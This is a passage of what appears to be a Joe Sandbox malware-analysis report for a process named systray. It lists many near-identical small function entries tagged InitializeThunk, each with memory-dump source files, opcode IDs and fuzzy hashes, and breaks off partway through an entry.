                                                                  • Instruction Fuzzy Hash: D3E046362106847FC220AA59DC51FDB776DEBC5760F404419FA08A7242C6B1BA158BE4
                                                                  Function 04B14650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3a05a16d44ccfc3f73a2aafd50100e89731f6f14eb73443af73e50788d8ef7ba
                                                                  • Instruction ID: 700f4e7e27f7193b0f395fe97759fe46da374ec1f7add39a2a05eeffdf3c98c4
                                                                  • Opcode Fuzzy Hash: 3a05a16d44ccfc3f73a2aafd50100e89731f6f14eb73443af73e50788d8ef7ba
                                                                  • Instruction Fuzzy Hash: F3900262601510526140715849054066005DBE2305395C355A0595561C8A18D9569269
                                                                  Function 04B14340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: a3abd863fa02085c32f0654c03b993c3f2d20a5bb7b1b1bf7284ac065a4f6bf0
                                                                  • Instruction ID: 3a239a7ac3988daa93b1902e16f9130a778c958b69a87ac7b61aa5974350ea53
                                                                  • Opcode Fuzzy Hash: a3abd863fa02085c32f0654c03b993c3f2d20a5bb7b1b1bf7284ac065a4f6bf0
                                                                  • Instruction Fuzzy Hash: 0C90023260581022B140715849855464005DBE1305B55C251E0465555C8E14DA575361
                                                                  Function 04B12CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b860d737b0c96121819ce67a8e549f160054bc50c9017446efe2651d45e79302
                                                                  • Instruction ID: b2ec0b9b120ee61aafa409239846183b8f5b358d9014a37fb5864faf0f139073
                                                                  • Opcode Fuzzy Hash: b860d737b0c96121819ce67a8e549f160054bc50c9017446efe2651d45e79302
                                                                  • Instruction Fuzzy Hash: A790023220141412F100759855096460005CBE1305F55D251A5065556ECA65D9926131
                                                                  Function 04B12C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b42510eaecbe186a0a53264eb5bece987831d03be2e14d16cf0d9b5019d70c9e
                                                                  • Instruction ID: 2a1faede83074b15ac07ca767620e29ee411774c8a6cabca61607078d8963fe6
                                                                  • Opcode Fuzzy Hash: b42510eaecbe186a0a53264eb5bece987831d03be2e14d16cf0d9b5019d70c9e
                                                                  • Instruction Fuzzy Hash: 2B90023220149812F1107158850574A0005CBD1305F59C651A4465659D8A95D9927121
                                                                  Function 04B12C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 16edf9c6e432a7cd38730dcb94171a7f7fc0161d16694f4fd5139c6a995dfe1d
                                                                  • Instruction ID: ed808a2003e88bbe0d98bded04c741c09fadb94f5448ee75c22b08fa28a0d565
                                                                  • Opcode Fuzzy Hash: 16edf9c6e432a7cd38730dcb94171a7f7fc0161d16694f4fd5139c6a995dfe1d
                                                                  • Instruction Fuzzy Hash: 3E90023220141852F10071584505B460005CBE1305F55C256A0165655D8A15D9527521
                                                                  Function 04B12DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 6262e1eb1835dc5e03d444b502cc9de398678d33fe27718fcd090f9ada953ef4
                                                                  • Instruction ID: 7438239a24c195992bb2ef88cfee2d6c3bf18a62c7f773738c2b77e243c264d6
                                                                  • Opcode Fuzzy Hash: 6262e1eb1835dc5e03d444b502cc9de398678d33fe27718fcd090f9ada953ef4
                                                                  • Instruction Fuzzy Hash: 2290023220141423F111715846057070009CBD1245F95C652A0465559D9A56DA53A121
                                                                  Function 04B12DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 255c8e10242f839eedd4b61af1a1633cfbd10302ff45cc0600cd0716cceb1d9a
                                                                  • Instruction ID: 8ced21c3cf34158cb89771a1199dd417116b43e3db70b4373a0f2f19d7e3221e
                                                                  • Opcode Fuzzy Hash: 255c8e10242f839eedd4b61af1a1633cfbd10302ff45cc0600cd0716cceb1d9a
                                                                  • Instruction Fuzzy Hash: 95900222242451627545B15845055074006DBE1245795C252A1455951C8926E957D621
                                                                  Function 04B12D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 951497c141d5550384623ca93dfcc920fce28f756dede4cc47ca5d6fb0b21b39
                                                                  • Instruction ID: d6319f6986f0d8e577aa199c9fd307e155b1cc2857befe7174c55fcdbc59d7d7
                                                                  • Opcode Fuzzy Hash: 951497c141d5550384623ca93dfcc920fce28f756dede4cc47ca5d6fb0b21b39
                                                                  • Instruction Fuzzy Hash: 5C90022230141013F140715855196064005DBE2305F55D251E0455555CDD15D9575222
                                                                  Function 04B12D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: edb2d18b289ae1d4364a491d23dad7e850410317aead10872eed9631ac73ca2b
                                                                  • Instruction ID: d29f4c995c1e3004d465c3d0c951947ce36153a21e68f518c8b48bff6f7e81f4
                                                                  • Opcode Fuzzy Hash: edb2d18b289ae1d4364a491d23dad7e850410317aead10872eed9631ac73ca2b
                                                                  • Instruction Fuzzy Hash: 4990022A21341012F1807158550960A0005CBD2206F95D655A0056559CCD15D96A5321
                                                                  Function 04B12E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3127f8727da512f4043463699c5d8417b1ad3cf0f6ce43b163e2b662ecd4b637
                                                                  • Instruction ID: df0ef1a6c84247c173f5d2e3f38d900a919b93280a181886c7ece1464ce146e1
                                                                  • Opcode Fuzzy Hash: 3127f8727da512f4043463699c5d8417b1ad3cf0f6ce43b163e2b662ecd4b637
                                                                  • Instruction Fuzzy Hash: 4D90022260141512F10171584505616000ACBD1245F95C262A1065556ECE25DA93A131
                                                                  Function 04B12EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: a3035068d851c955526f640d1fbacad6d4ca15e168b57a1365fe957d3a7b5946
                                                                  • Instruction ID: 267a05608971b98c326a8fff904092c98e30d7d7ab90e390a21006f29b559916
                                                                  • Opcode Fuzzy Hash: a3035068d851c955526f640d1fbacad6d4ca15e168b57a1365fe957d3a7b5946
                                                                  • Instruction Fuzzy Hash: E790026220181413F140755849056070005CBD1306F55C251A20A5556E8E29DD526135
                                                                  Function 04B12FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 338dfe9be1e426162d6fda59cf6e0187bc2e4eb0bdfb50557a17abeff60c18aa
                                                                  • Instruction ID: c2afc6e1c6bf779841e135ed72ee0e9f9a2ea9331c6894d1b011b9083463e848
                                                                  • Opcode Fuzzy Hash: 338dfe9be1e426162d6fda59cf6e0187bc2e4eb0bdfb50557a17abeff60c18aa
                                                                  • Instruction Fuzzy Hash: E2900222601410526140716889459064005EFE2215755C361A09D9551D8959D9665665
                                                                  Function 04B12FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 1594b8e3f9aa27cd8cb5a07c877ffddafdbaf49f00afd64ebbd801800b0f2e13
                                                                  • Instruction ID: 98c34a9f828fa1b3256f7548e91621d456d955fea58bf7f340736c885a370f5b
                                                                  • Opcode Fuzzy Hash: 1594b8e3f9aa27cd8cb5a07c877ffddafdbaf49f00afd64ebbd801800b0f2e13
                                                                  • Instruction Fuzzy Hash: 1F900222211C1052F20075684D15B070005CBD1307F55C355A0195555CCD15D9625521
                                                                  Function 04B12F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: f3d494795a52b7bc256df032bcadee6fec81aafbc6856820193e0738a6954f5a
                                                                  • Instruction ID: 664774356fb00f3a8d85d08db5de969cc5e3066347a32f06da9503607f344b84
                                                                  • Opcode Fuzzy Hash: f3d494795a52b7bc256df032bcadee6fec81aafbc6856820193e0738a6954f5a
                                                                  • Instruction Fuzzy Hash: C890026234141452F10071584515B060005CBE2305F55C255E10A5555D8A19DD536126
                                                                  Function 04B12AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 2e322c506a70fc3c8692c91f998628ec40dc17ab9ada6cad29a09e93f6722d2f
                                                                  • Instruction ID: c09c1bd8db7d8c70e3cfd16e242cfd89ceb47e4844c7cf3f56c7a41d3102301b
                                                                  • Opcode Fuzzy Hash: 2e322c506a70fc3c8692c91f998628ec40dc17ab9ada6cad29a09e93f6722d2f
                                                                  • Instruction Fuzzy Hash: F9900226221410122145B558070550B0445DBD7355395C255F1457591CCA21D9665321
                                                                  Function 04B12AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 86ca813ae87609993b60a4b75da521f978c6cd0d94e3fda6458be527a657b893
                                                                  • Instruction ID: 751871e332f7169ae70df6d40ebd02a3dc3f6f20541c30572c7ce99bc3b31ecb
                                                                  • Opcode Fuzzy Hash: 86ca813ae87609993b60a4b75da521f978c6cd0d94e3fda6458be527a657b893
                                                                  • Instruction Fuzzy Hash: EA900226211410132105B55807055070046CBD6355355C261F1056551CDA21D9625121
                                                                  Function 04B12BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 228425b62c773a6de58e4cff8d11d0554a4f8fd1e04212620ebb869a7991bad4
                                                                  • Instruction ID: 6e7f4da75d16ab00794505b9b92fe5a3790d229a936e60f7aef47703a2b57547
                                                                  • Opcode Fuzzy Hash: 228425b62c773a6de58e4cff8d11d0554a4f8fd1e04212620ebb869a7991bad4
                                                                  • Instruction Fuzzy Hash: 9990023260541812F150715845157460005CBD1305F55C251A0065655D8B55DB5676A1
                                                                  Function 04B12BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: a6639eb57a1e2210cf491148341cf97d7c5d54ac89e05cde04bd450bdc375d0b
                                                                  • Instruction ID: 488453763ff496acddfee7170105b8b4b4d06d6b4d79da64019fbaaaf9bce74d
                                                                  • Opcode Fuzzy Hash: a6639eb57a1e2210cf491148341cf97d7c5d54ac89e05cde04bd450bdc375d0b
                                                                  • Instruction Fuzzy Hash: 1D90023220141812F1807158450564A0005CBD2305F95C255A0066655DCE15DB5A77A1
                                                                  Function 04B12BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 5ed583c8e8d322318a7ef02ec019215238f2e8eba3d8479bfeae2a6c9e33bd9a
                                                                  • Instruction ID: 38e53cfd495b592efa77e6bdc3a1ce980c9eea2f519d3082d9c83ef3114a0f17
                                                                  • Opcode Fuzzy Hash: 5ed583c8e8d322318a7ef02ec019215238f2e8eba3d8479bfeae2a6c9e33bd9a
                                                                  • Instruction Fuzzy Hash: 8C90023220545852F14071584505A460015CBD1309F55C251A00A5695D9A25DE56B661
                                                                  Function 04B12B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 534e583c791b5faffbf8d7e943e8c6db02cfb32259ae25abf5c4d4e598247ba9
                                                                  • Instruction ID: 437970a43fe1792f999e38b6c3922556f9980ab0a84ae486d881547ed4d62711
                                                                  • Opcode Fuzzy Hash: 534e583c791b5faffbf8d7e943e8c6db02cfb32259ae25abf5c4d4e598247ba9
                                                                  • Instruction Fuzzy Hash: D790026220241013610571584515616400ACBE1205B55C261E1055591DC925D9926125
                                                                  Function 04B135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3d970dac0aa27ea19b6f2b5de6d88c855b0d1678aa37483eed48fe65d5e317ec
                                                                  • Instruction ID: 042cd399dd1ca98ea6a084e54f52c8e2b375998b4d0240177aa1efe8f7f829d7
                                                                  • Opcode Fuzzy Hash: 3d970dac0aa27ea19b6f2b5de6d88c855b0d1678aa37483eed48fe65d5e317ec
                                                                  • Instruction Fuzzy Hash: 5390023260551412F100715846157061005CBD1205F65C651A0465569D8B95DA5265A2
                                                                  Function 04B139B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 490da627e748a9750414c6b90dd52b2af185088a062f9d8a536850bfdecb2728
                                                                  • Instruction ID: 0327645f942917626037522258ef14eb4420b73851b8bde4fd9668381cb5b5ff
